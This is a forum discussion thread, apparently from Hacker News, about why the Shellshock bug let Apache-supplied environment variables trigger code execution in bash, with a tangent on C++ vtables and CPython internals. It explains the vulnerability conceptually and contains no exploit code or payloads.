In bash, function definitions can be exported via environment variables; in handling that bash also executes whatever immediately follows the function definition; Apache sets environment variables (without sanitizing them for the above) based on incoming HTTP request headers which are controlled by end user clients.
Because this functionality in bash predated Apache, it could be argued that Apache ought to perform sanitization before setting env vars from user input given that bash might execute it, but on the other hand bash's ability for data to be executed as code was pretty much undocumented and is now considered the bug.
> but on the other hand bash's ability for data to be executed as code was pretty much undocumented and is now considered the bug.
From the article you linked:
> Since Bash is both a command interpreter and a command, it is possible to execute Bash from within Bash. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions.
I had this strange feeling after reading this, that it's been long time since people worked with low-level code. It's like the difference between method dispatch in C++ and, say, Python. In the latter, it's magic, it works and you don't care. In the former, it's part of basic language knowledge to understand how virtual methods are implemented by a hack involving pointers to arrays of function pointers (aka. vtables).
> In the former, it's part of basic language knowledge to understand how virtual methods are implemented
Since when? While Hex-ray's IDA let me dig into exactly how vtables work, it's not like you even need to have heard of how vtables before you can stick the word 'virtual' in the right place for you code to do what you want.
Similarly: If you're a long-time Python programmer, and have never looked into the internals, it's a good exercise. There's a (in CPython) CALL_FUNCTION instruction that PyEval_EvalFrameEx (in Python/ceval.c) dispatches that (and, well, all) opcodes. And... and... It's not magic, yes it does work, I don't know if you care, I certainly do.
If you want to be ignorant of the lower-levels of code, Python certainly makes it easier (strings are an easy-to-use built-in language feature? madness!), but let's not pretend every programmer who has ever touched C++ has heard of vtables.
Because this functionality in bash predated Apache, it could be argued that Apache ought to perform sanitization before setting env vars from user input given that bash might execute it, but on the other hand bash's ability for data to be executed as code was pretty much undocumented and is now considered the bug.
Wikipedia has a good explanation at http://en.wikipedia.org/wiki/Shellshock_(software_bug)